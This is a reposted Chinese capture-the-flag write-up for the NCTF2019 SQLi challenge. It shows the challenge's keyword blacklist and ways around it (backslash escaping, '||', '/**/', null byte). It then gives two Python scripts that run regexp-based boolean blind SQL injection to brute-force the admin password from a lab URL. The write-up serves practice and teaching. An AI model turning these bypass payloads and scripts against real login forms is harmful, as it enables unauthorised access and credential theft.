目录

[NCTF2019]SQLi regexp 盲注

/robots.txt

访问一下

复制代码
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

这里实现了过滤

说需要admin的密码

这里我们可以发现没有过滤 \ 所以username 我们可以通过 \ 来绕过

所以我们通过passwd注入

or 使用 || 代替

然后空格使用 /**/代替

我们尝试登入

发现进行302跳转 但是没办法

所以还是要通过 查询admin passwd 进入

所以我们开始

写注入的代码 这里很多都被过滤了

但是放出了 ^和 regexp

正则

我们可以通过正则来读取

和下面的例子一样

复制代码
select (select 'b') > (select 'abc')  这个时候会返回0


select name regexp "^a"     这里的name是admin   //我自己的数据库

返回的是1

所以我们可以通过 布尔注入实现这道题的读取

复制代码
import time
from urllib import parse

import requests
import string

baseurl="http://271f8427-5e33-4411-aae5-90e418285c4f.node4.buuoj.cn:81/"

paylaod = '||/**/passwd/**/regexp/**/"^{}";{}'

def add(flag):
    res=''
    res += flag
    return  res
flag=''
ascii_chars = string.ascii_letters + string.digits + string.punctuation
print(ascii_chars)
for i in range(20):
    for j in ascii_chars:
        data = add(flag+j)
        paylaod1 = paylaod.format(data,parse.unquote('%00'))
        print(paylaod1)
        data={'username':'\\',
              'passwd':paylaod1}
        re=requests.post(url=baseurl,data=data)
        if re.status_code == 429:
            time.sleep(0.5)
        if "welcome.php" in re.text:
            flag += j
            print(flag)
            break

这里很坑 上面的 字符*的时候会循环输出

you*u*u*u

不知道是环境问题还是什么

所以我们现在替换

复制代码
import time
from urllib import parse

import requests
import string

baseurl="http://271f8427-5e33-4411-aae5-90e418285c4f.node4.buuoj.cn:81/"

paylaod = '||/**/passwd/**/regexp/**/"^{}";{}'

def add(flag):
    res=''
    res += flag
    return  res
flag=''
ascii_chars = string.ascii_letters+string.digits+"_"
for i in range(20):
    for j in ascii_chars:
        data = add(flag+j)
        paylaod1 = paylaod.format(data,parse.unquote('%00'))
        data={'username':'\\',
              'passwd':paylaod1}
        re=requests.post(url=baseurl,data=data)
        if re.status_code == 429:
            time.sleep(0.5)
        if "welcome.php" in re.text:
            flag += j
            print(flag)
            break

这个就可以爆出值了

复制代码
you_will_never_know7788990
本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
wniuniu_6 小时前
Pow工作量证明是啥
开发语言·区块链·php
JioJio~z10 小时前
网络基础-路由技术和交换技术以及其各个协议
网络·智能路由器·php
雯0609~10 小时前
PHP:将关联数组转换为索引数组的完整示例
android·oracle·php
onejason11 小时前
如何解析商品的价格信息?
前端·后端·php
林十一npc17 小时前
ShopXO v2.2.4开源商城手动部署(保姆级)+异常处理
软件测试·数据库·mysql·php·商城·云服务器·shopxo
亿坊电商20 小时前
不同PHP框架之间的兼容性问题及应对策略!
开发语言·php·php框架
憋废话_开码1 天前
phpstrom 配置调试 php 项目全流程,弄清一些概念
开发语言·php
小白学大数据1 天前
如何避免Python爬虫重复抓取相同页面?
开发语言·爬虫·python·php
QC七哥2 天前
基于php扩展加密的一个简单逆向
php·逆向
爱写代码的小朋友2 天前
PHP+Vue 3实现增删改查(CRUD)
开发语言·vue.js·php